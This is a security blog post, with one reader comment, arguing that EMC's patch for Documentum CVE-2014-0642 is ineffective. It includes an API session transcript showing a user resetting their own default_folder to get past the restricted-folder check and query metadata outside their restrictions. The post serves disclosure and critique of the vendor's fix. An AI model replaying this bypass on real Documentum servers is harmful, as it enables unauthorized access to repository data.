About restricted folders

On April 10, 2014 EMC announced CVE-2014-0642:

EMC Documentum Content Server may be vulnerable to an information disclosure vulnerability that may potentially be exploited by malicious users to gain unauthorized access to metadata. This is due to improper authorization checks being performed when trying to access metadata from folders outside of restricted folders configured for Content Server users. This vulnerability is only limited to reading the metadata as the malicious user is not able to gain read/write access to the content itself.

The researcher of this vulnerability is Yuri Simione, he is even going to publish “exploit” (however it took 10 minutes for me to understand how to exploit vulnerability, but I’m not going to publish any related information). Initially I was confused by the following thing: Yuri writes that he discovered vulnerability in January 2014, EMC has written that vulnerability is fixed in CS7.1SP2 (released on March 1, 2014), so it takes just one month to fix vulnerability (note that usage of restricted folders feature causes wrong results for some queries). EMC is trying to fix multiple XSRFs more than year and still does not get any success, privilege escalation vulnerabilities was discovered by me in November 2013 and those vulnerabilities are still not fixed, but it’s worth to fix low-impact vulnerabilities within a month, what a shame!

But today I realized that EMC actually didn’t fix anything, to demonstrate this fact I’m not going to use any SQL injections and/or undocumented rpc-commands, just simple API and my knowledge about security model:

API> retrieve,c,dm_user where user_name=USER
...
1102242880000143
API> get,c,l,user_name
...
dmc_wdk_presets_owner
API> ?,c,select count(*) from dm_sysobject where folder('/Temp',DESCEND)
[DM_QUERY_E_NOT_RESTRICTED_FOLDER_PATH]error:  
  "You have specified a folder path ( '/Temp' ) that is not a folder 
  (or subfolder of a folder) in the user's restricted_folder_ids."

API> get,c,l,default_folder
...
/Resources/Registry/Presets/Webtop
API> values,c,l,restricted_folder_ids
...
4
API> get,c,l,restricted_folder_ids[0]
...
0c02242880000130
API> get,c,l,restricted_folder_ids[1]
...
0c02242880000106
API> get,c,l,restricted_folder_ids[2]
...
0c02242880000130
API> get,c,l,restricted_folder_ids[3]
...
0c02242880000106
API> get,c,0c02242880000130,r_folder_path[0]
...
/Resources
API> get,c,0c02242880000106,r_folder_path[0]
...
/System
API> set,c,l,default_folder
SET> /Temp
...
OK
API> save,c,l
...
[DM_FOLDER_E_PATH_EXISTS]error:  "Cannot save (or link) 'Temp' 
  folder with path name '/Temp' because one already exists."
^^^
 we are going to ignore this error

API> connect,xcp21,dmc_wdk_presets_owner,webtop
...
s1
API> ?,c,select count(*) from dm_sysobject where folder('/Temp',DESCEND)
count(*)
----------------------
                   792
(1 row affected)

One thought on “About restricted folders

  1. Actually EMC spent more than 2 months to solve this vulnerability that I disclosed the 2nd of January. Regarding another vulnerability I discovered on July 2011, EMC published the ESA-2012-009, six months later: too much, in my opinion. I think that two months to solve the ESA-2014-026 related issue aren’t too much, because the vulnerability impacted the Content Server engine: so four impacted version (6.7 Sp1, 6.7 Sp2, 7.0 and 7.1), for all the supported combinations (o.s. / database). Thanks for sharing your knowledge, Andrey: I like your posts!

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s